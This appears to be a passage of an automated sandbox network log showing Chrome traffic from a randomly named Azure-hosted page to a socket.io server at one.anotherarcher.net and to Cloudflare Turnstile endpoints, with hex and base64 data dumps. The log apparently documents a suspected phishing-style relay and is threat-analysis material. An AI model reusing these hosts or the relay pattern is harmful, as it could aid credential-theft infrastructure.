                                                                                                                                                                                                                                Data Ascii: /waaOeaO0gpabrraJw8aMqY2/zMyQr7SN3Nnfnd/amNObnrno1ty8xeC13enm8uO/r/LNxMvP6NTwtfvUz+y6ztTewdzgA8bLxOAEBg3j8PPu8e8LztXs2RAGChT76vAc4eHdEx4IAQIaD+0k7hry7vI28iAKERsy9Q4sOkH6Qfr8EEQEFisLOQcfDTAmSTwsLBM/JREkKE9LMT1QG100LlIgNVZkVmYqYWxwL0U+aCosb3VIdUZtTD11cUBcWX
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 70 34 4c 44 72 61 66 42 70 61 75 75 69 6f 79 7a 31 39 43 32 74 70 62 52 6c 61 37 61 30 64 37 43 75 35 76 68 75 4c 62 57 79 4d 43 7a 32 61 66 4c 74 75 37 41 7a 4c 33 4d 33 4d 76 78 32 4e 66 74 36 39 76 77 75 74 6e 49 38 39 44 67 77 76 37 78 78 64 44 63 33 4e 66 36 35 4e 72 59 2f 4d 6a 74 37 4f 73 41 2f 52 63 59 2b 50 62 6e 43 77 66 76 36 52 38 4b 45 65 6f 6a 37 4f 37 7a 46 76 7a 32 33 43 66 69 36 77 48 74 38 43 51 55 45 77 62 73 49 41 38 4b 4b 66 49 77 43 42 6e 2b 39 52 42 43 4c 69 41 45 45 76 77 37 4e 54 51 37 44 41 30 72 4c 45 4d 6d 49 44 45 70 4b 46 4d 31 4c 52 55 7a 52 68 5a 48 47 45 39 57 56 7a 74 54 4e 7a 41 33 58 7a 67 32 59 54 30 30 51 47 56 42 4f 45 68 70 52 54 78 4e 4c 55 31 46 61 47 30 74 53 57 56 30 55 31 4e 66 50 56 64 35 56 45 4a 54 52 31 31
                                                                                                                                                                                                                                Data Ascii: p4LDrafBpauuioyz19C2tpbRla7a0d7Cu5vhuLbWyMCz2afLtu7AzL3M3Mvx2Nft69vwutnI89Dgwv7xxdDc3Nf65NrY/Mjt7OsA/RcY+PbnCwfv6R8KEeoj7O7zFvz23Cfi6wHt8CQUEwbsIA8KKfIwCBn+9RBCLiAEEvw7NTQ7DA0rLEMmIDEpKFM1LRUzRhZHGE9WVztTNzA3Xzg2YT00QGVBOEhpRTxNLU1FaG0tSWV0U1NfPVd5VEJTR11
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 38 65 2b 71 72 54 56 74 4a 2b 51 77 64 4f 54 79 4b 33 48 6e 61 43 68 32 70 71 76 6e 72 50 6a 77 4d 54 55 33 36 4c 4d 7a 74 71 2f 71 2b 43 71 71 37 58 6e 78 76 50 44 74 50 62 32 39 2b 61 36 73 73 48 71 75 62 38 42 32 2f 66 48 78 4e 76 6c 2f 67 58 36 37 2f 6e 6f 35 73 34 55 36 42 50 53 42 50 6e 70 47 73 37 64 42 39 58 63 37 66 50 39 2b 42 37 35 4b 52 63 68 47 42 63 49 42 52 6b 4e 4a 42 49 74 37 43 49 58 45 66 51 54 42 79 30 4b 46 77 73 74 2b 6a 6b 5a 4e 78 51 36 39 30 49 55 51 78 6b 32 43 30 63 38 48 42 6b 68 4a 78 34 2f 43 78 59 70 46 68 59 6d 50 44 6f 79 56 6b 67 61 55 46 6c 51 54 30 41 39 55 55 56 63 53 6d 55 6c 57 6b 39 4a 4c 56 6b 2f 5a 55 49 75 54 6d 70 4a 53 30 39 75 63 46 64 4c 62 54 74 35 57 58 64 55 64 32 4b 43 56 49 4e 5a 64 6e 61 48 66 46 78 5a
                                                                                                                                                                                                                                Data Ascii: 8e+qrTVtJ+QwdOTyK3HnaCh2pqvnrPjwMTU36LMztq/q+Cqq7XnxvPDtPb29+a6ssHqub8B2/fHxNvl/gX67/no5s4U6BPSBPnpGs7dB9Xc7fP9+B75KRchGBcIBRkNJBIt7CIXEfQTBy0KFwst+jkZNxQ690IUQxk2C0c8HBkhJx4/CxYpFhYmPDoyVkgaUFlQT0A9UUVcSmUlWk9JLVk/ZUIuTmpJS09ucFdLbTt5WXdUd2KCVINZdnaHfFxZ
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 48 47 73 4a 65 31 79 72 57 62 75 63 36 71 6e 37 33 53 72 36 50 42 31 72 53 6e 78 64 71 35 77 37 72 66 30 64 50 67 34 39 50 75 77 73 4b 78 39 73 62 4f 74 75 66 64 36 72 75 35 37 4c 76 59 2f 50 44 51 39 62 7a 59 36 2f 30 42 35 4e 2f 75 34 41 76 70 35 77 4c 32 30 52 66 78 43 42 6e 6c 47 42 73 4f 41 53 45 52 38 50 58 32 42 42 30 67 47 76 34 46 36 41 33 39 45 4f 77 51 4c 43 4d 30 4d 69 45 6e 4f 76 63 6e 4d 6a 38 4d 2b 2f 66 35 52 42 55 30 41 53 41 6e 4f 69 67 64 46 78 63 47 53 78 73 6a 49 43 59 75 51 42 41 4f 51 52 45 77 56 56 4d 38 56 45 39 62 4d 44 77 7a 4e 54 6f 34 52 6a 64 68 5a 30 4a 59 61 54 5a 71 61 30 39 7a 5a 79 70 42 52 6b 68 42 55 7a 55 30 55 6c 77 35 58 48 68 76 67 48 35 74 63 34 5a 42 66 6b 4a 5a 61 45 52 5a 54 70 43 4a 59 32 39 51 5a 49 35 76 54
                                                                                                                                                                                                                                Data Ascii: HGsJe1yrWbuc6qn73Sr6PB1rSnxdq5w7rf0dPg49PuwsKx9sbOtufd6ru57LvY/PDQ9bzY6/0B5N/u4Avp5wL20RfxCBnlGBsOASER8PX2BB0gGv4F6A39EOwQLCM0MiEnOvcnMj8M+/f5RBU0ASAnOigdFxcGSxsjICYuQBAOQREwVVM8VE9bMDwzNTo4RjdhZ0JYaTZqa09zZypBRkhBUzU0Ulw5XHhvgH5tc4ZBfkJZaERZTpCJY29QZI5vT
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 62 33 4e 48 68 6e 74 43 76 31 70 79 6a 77 75 4c 43 77 37 76 6f 71 75 7a 68 36 62 44 79 78 2b 61 78 72 63 76 68 2b 50 48 73 31 37 72 30 76 73 7a 64 7a 39 62 46 31 64 7a 36 39 64 4c 4b 34 76 58 34 36 41 62 5a 42 75 49 4e 46 66 58 30 39 76 6f 4e 43 4f 66 39 37 75 37 7a 39 43 44 2b 2f 76 4c 33 49 75 55 44 34 69 76 70 43 41 72 37 49 41 7a 78 48 77 6a 74 45 77 41 52 45 51 73 64 38 78 73 65 4b 78 41 77 2b 77 34 68 48 77 45 7a 4a 54 77 58 4f 42 55 46 48 7a 38 67 55 67 73 76 4b 6b 59 30 46 55 38 61 4e 44 4d 36 56 55 35 56 47 6c 31 45 4d 31 49 76 4e 7a 6c 61 58 6b 64 58 4a 30 74 41 53 55 42 67 4c 44 35 30 54 53 6c 6b 55 57 6c 54 63 6d 31 59 53 31 6c 52 50 46 67 39 64 56 31 6a 68 45 6c 70 52 6d 6c 61 6a 58 71 52 66 49 69 45 54 47 69 54 64 45 70 6d 63 34 61 61 63 6d
                                                                                                                                                                                                                                Data Ascii: b3NHhntCv1pyjwuLCw7voquzh6bDyx+axrcvh+PHs17r0vszdz9bF1dz69dLK4vX46AbZBuINFfX09voNCOf97u7z9CD+/vL3IuUD4ivpCAr7IAzxHwjtEwAREQsd8xseKxAw+w4hHwEzJTwXOBUFHz8gUgsvKkY0FU8aNDM6VU5VGl1EM1IvNzlaXkdXJ0tASUBgLD50TSlkUWlTcm1YS1lRPFg9dV1jhElpRmlajXqRfIiETGiTdEpmc4aacm


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                61192.168.2.44982179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC643OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB33y HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:17 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 56 30 53 62 61 43 37 68 77 57 5f 39 4a 48 55 6f 41 41 4e 55 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"V0SbaC7hwW_9JHUoAANU","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                62192.168.2.449822104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1196277238:1727987378:xQwj6ohpz9SE6dkMLdxLHe_SWJOpM8PdC9Yl1QqgVmI/8ccfd7c5dee932f4/855664d3aeedc47 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:17 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cf-chl-out: xzDQMWLEOihP4+3j1FkiUOndI3S9t291b1A=$xLiQ1SjJAMcdiDZT
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7fb199d18bc-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                63192.168.2.449823104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/136349667:1727987345:YIwZHJwwHqPIcBZYWS-e5MClYzwtIJxGEVjRi2T8QKc/8ccfd7ea7f73238a/742272a500bdc81 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:17 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cf-chl-out: C9Zynb5jG3/HBR/2mNFGfL/jVqdOY28QZ74=$tuZJw1oak6jfbR7S
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7fcfeb90c8e-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                64192.168.2.44982579.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC586OUTGET /socket.io/?EIO=4&transport=websocket&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Sec-WebSocket-Key: SygAnqU9uz1qSZEW4iQ/oA==
                                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:18 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                65192.168.2.44982479.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC728OUTPOST /socket.io/?EIO=4&transport=polling&t=P9KB3JN&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC2OUTData Raw: 34 30
                                                                                                                                                                                                                                Data Ascii: 40
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC207INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:18 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC2INData Raw: 6f 6b
                                                                                                                                                                                                                                Data Ascii: ok


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                66192.168.2.44982679.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB3JO&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:18 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 32
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 47 6b 5f 5a 59 5f 62 44 51 4c 57 6d 54 55 6a 39 41 41 4e 56 22 7d
                                                                                                                                                                                                                                Data Ascii: 40{"sid":"Gk_ZY_bDQLWmTUj9AANV"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                67192.168.2.44982779.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC389OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB33y HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:18 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 67 2d 68 54 55 41 4f 4a 48 4c 55 77 49 74 6c 30 41 41 4e 57 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"g-hTUAOJHLUwItl0AANW","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                68192.168.2.449828104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:17 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ccfd7ea7f73238a/1727989036533/e770f48f5b9749bfdcc46c36818001666acdbcacdfd39cdef621d12f9f2395b6/7jF8x5IxNNu0sBR HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:18 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 35 33 44 30 6a 31 75 58 53 62 5f 63 78 47 77 32 67 59 41 42 5a 6d 72 4e 76 4b 7a 66 30 35 7a 65 39 69 48 52 4c 35 38 6a 6c 62 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g53D0j1uXSb_cxGw2gYABZmrNvKzf05ze9iHRL58jlbYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC1INData Raw: 4a
                                                                                                                                                                                                                                Data Ascii: J


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                69192.168.2.449830104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:18 UTC843OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:18 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 165128
                                                                                                                                                                                                                                Connection: close
